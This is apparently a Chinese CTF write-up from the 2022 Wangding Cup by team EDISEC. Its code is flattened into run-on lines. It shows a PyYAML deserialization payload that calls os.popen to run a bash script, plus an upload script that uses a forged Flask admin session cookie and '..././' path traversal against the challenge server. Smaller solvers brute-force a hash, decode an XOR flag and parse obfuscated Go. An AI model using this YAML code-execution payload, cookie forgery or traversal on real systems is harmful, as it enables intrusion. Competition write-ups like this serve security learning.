2022网鼎杯青龙组CTF-WriteUp By EDISEC

!!python/object/new:frozenset- !!python/object/new:map- !!python/name:os.popen- ["bash /tmp/1/suanve"]import requestsimport os# rarname = f"1"rarname = f"fileinfo"# 第一次 rarname 要为 1# 第二次 rarname 要为 fileinfoprint(rarname)print("/Users/suan/Downloads/rar/rar a '" + rarname + "'f28f1f003578cfa35c012249c819edfa.yaml suanve")os.system("/Users/suan/Downloads/rar/rar a '" + rarname + "'f28f1f003578cfa35c012249c819edfa.yaml suanve")burp0_url = "http://eci2ze31f5e4ml2o80d0k06.cloudeci1.ichunqiu.com:8888/upload"burp0_cookies = {"session":"eyJ1cGRpciI6Ii4vIiwidXNlciI6IkFkbWluaXN0cmF0b3IifQ.YwhAgQ.zcTOfpH44hAr6LcRs778nqfYi2Q"}# 第一次 session dir 要为 /tmp/# 第二次 session dir 要为 ./# 创建目录requests.get("http://eci2ze31f5e4ml2o80d0k06.cloudeci1.ichunqiu.com:8888/")f = {"file": open(rarname+".rar", "rb")}s = requests.post(burp0_url,cookies=burp0_cookies, files=f)print(s.text)print("[!] path: " +"static/uploads/f528764d624db129b32c21fbca0cb8d6/"+rarname+"/")# s = os.popen("/Users/suan/tools/flask-session-cookiemanager/flask_session_cookie_manager3.py encode -t'{"updir":./","user":"Administrator"}' -s "engine1"").read()print(s)s = requests.get("http://eci2ze31f5e4ml2o80d0k06.cloudeci1.ichunqiu.com:8888/display?file=1.yaml")import requestsprint(s.text)burp0_url = "http://eci2ze31f5e4ml2o80d0k06.cloudeci1.ichunqiu.com:8888/..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././..././tmp/1"s = requests.get(burp0_url)print(s.text)

import hashlibnum = 8617090000000data ='c22a563acc2a587afbfaaaa6d67bc6e628872b00bd7e998873881f7c6fdc62fc'def getnum():num = 8617090000000for i in range(9999999):num = num + 1# print(num)s = hashlib.sha256()s.update(str(num).encode())b = s.hexdigest()# parameters_authentication("111", b, 1634884391)print(num,b)if b == data:print('flag:{0}'.format(num))breakimport threadingthread1 = threading.Thread(name='t1',target=getnum)thread2 = threading.Thread(name='t2',target=getnum)thread3 = threading.Thread(name='t3',target=getnum)thread1.start()thread2.start()thread3.start()

data = [0x4B, 0x48, 0x79, 0x13, 0x45, 0x30, 0x5C, 0x49, 0x5A,0x79, 0x13, 0x70, 0x6D, 0x78, 0x13, 0x6F, 0x48, 0x5D, 0x64, 0x64]flag = ''for i in range(20):flag +=(chr((data[i]^0x50)-10^0x66))print(flag)

flag{why_m0dify_pUx_SheLL}

import res = open("challenge.go")c = []for i in s.readlines():c.append(i.strip())calls = {}for i in range(len(c)):if "return cHZv5op8rOmlAkb6(" in c[i]:# 获取所有调用了cHZv5op8rOmlAkb6的函数call = re.findall("[w]{16}",c[i-4])[0]cc = 0for i2 in range(len(c)):if f"return {call}()" in c[i2]:cc += 1print(call,cc)### cat challenge.go|grep -E "(.*, gLIhR,.*)"a = open("t1")for i in a.readlines():if len(re.findall(r',',i))==5:print(i)

print(read('flag'))<EOF>Not we wil run your *.js with d8flag{92394598-5bbf-4fd7-866a-da319bce9809}done!